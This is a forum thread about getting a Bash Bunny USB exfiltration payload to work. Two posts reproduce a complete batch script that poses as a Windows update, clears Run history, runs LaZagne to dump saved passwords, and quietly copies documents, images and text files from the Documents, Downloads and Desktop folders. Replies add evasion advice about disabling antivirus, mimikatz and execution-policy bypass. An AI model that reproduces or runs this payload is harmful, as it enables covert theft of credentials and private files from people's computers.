CuChulaind Posted September 17, 2018 Share Posted September 17, 2018 Hello, New to BB, and testing out some payloads. I have updated my BB, been able to connect serially, as well as share my network connection with the device on Windows (not so much with bb.sh using Arch) and able to ssh into the device as well. I have successfully run the notepad payload that creates the notepad file regarding locking you computer. I am unlucky with the usb_exfiltrator payload. I have installed the laZagne.exe, but I'm not so much concerned about the passwords right now. When I run the payload, I expect a new directory in loot to be created named the name of my hostname, as well as 1 pdf file in that directory. In my loot directory I also expect to see a password file. I did make a copy of the REM line that copies any .pdf file, and removed the /E flag (so as not to look in subdirectories) to keep it simple: xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul After running the payload (on my Win 10 machine), my loot directory contains a new directory named my victim hostname, however that directory is empty. A password file is also created in the loot directory, however it is empty. Among my files and directories in my Documents directory I do have 1 pdf, which I expected to be copied to the Bash Bunny loot directory under the created hostname directory. Suggestions / Corrections greatly appreciated! Thank you. Entire e.cmd file: @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM This executes LaZagne in the current directory and outputs the password file to Loot REM Time and Date is also added setlocal cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit Link to comment Share on other sites More sharing options...
koukouille Posted November 9, 2018 Share Posted November 9, 2018 I am facing the same problem. But, I tried some tests and have a part of the response. When I plugged the first time the BB, I only have 1 empty folder in loot folder. When I plugged a second time the BB (without delete the first result empty folder), I have a second folder AND an empty passwords.txt file. USB_exfiltration use Lazagne and Lazagne is detected by anti-virus. Then, when I put Lazagne.exe in tools folder in BB, unplug BB, put it in attackmode and plug it again, Lazagne situated in tools folder is silently deleted. When I desable my Windows Defender and repeat the same action, after the second plug, BOOM the passwords.txt file is filled by all my passwords AND Lazagne is still present in tools folder. Conclusion : for password extract, USB_exfiltration AND PasswordGrabber are blocked because they use Lazagne which is detected, blocked and deleted by antivirus. But for the file copy, I don't know why it doesn't works. Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted November 13, 2018 Share Posted November 13, 2018 First...the part of Lazagne that does mimikatz will not work on Win10 because it uses the old Invoke-Mimikatz powershell script that doesn't work in Win10 anymore. If you compile from source you can probably replace that section with the new one I posted about in the forums and it will work. Next, AV will see mimi and the other payloads. I played with Win10 AV to see how well it detects and it detects even encrypted Posh scripts because they eventually will have to be decrypted to run and that is when AV gets it so it is safe to say you will need AV hindered to run this payload. For the copy script. Only question I have is are there any pdf files in the Documents folder. If there isn't nothing is there to copy. Link to comment Share on other sites More sharing options...
tuug Posted March 1, 2023 Share Posted March 1, 2023 Hi will this code work or do i have to change some stuff e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM This executes LaZagne in the current directory and outputs the password file to Loot REM Time and Date is also added setlocal cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM Copy files from Documents folder xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xlsx %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.png %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.gif %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.txt %dst% >>nul ) REM Copy files from Downloads folder if Exist %USERPROFILE%\Downloads ( xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.pdf %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.doc %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.docx %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.xlsx %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.jpg %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.png %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.gif %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.txt %dst% >>nul ) REM Copy files from Desktop folder if Exist %USERPROFILE%\Desktop ( xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.pdf %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.doc %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.docx %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.xlsx %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.jpg %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.png %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.gif %dst% >>nul xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.txt %dst% >>nul ) /Volumes/B-BUNNY/e.cmd REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit Link to comment Share on other sites More sharing options...
Irukandji Posted March 1, 2023 Share Posted March 1, 2023 Hey, this is very old topic... Like 4 years.. And the Mark one Bash Bunny 🐇 Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 1, 2023 Share Posted March 1, 2023 4 hours ago, tuug said: do i have to change some stuff If you run the script, you will probably be aware of what's needed. As already been said in the thread, laZagne will probably not work, adjustments perhaps are needed depending on what kind of user the Windows box has, the powershell line most likely needs to be changed since it doesn't include a bypass of execution policy, etc. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.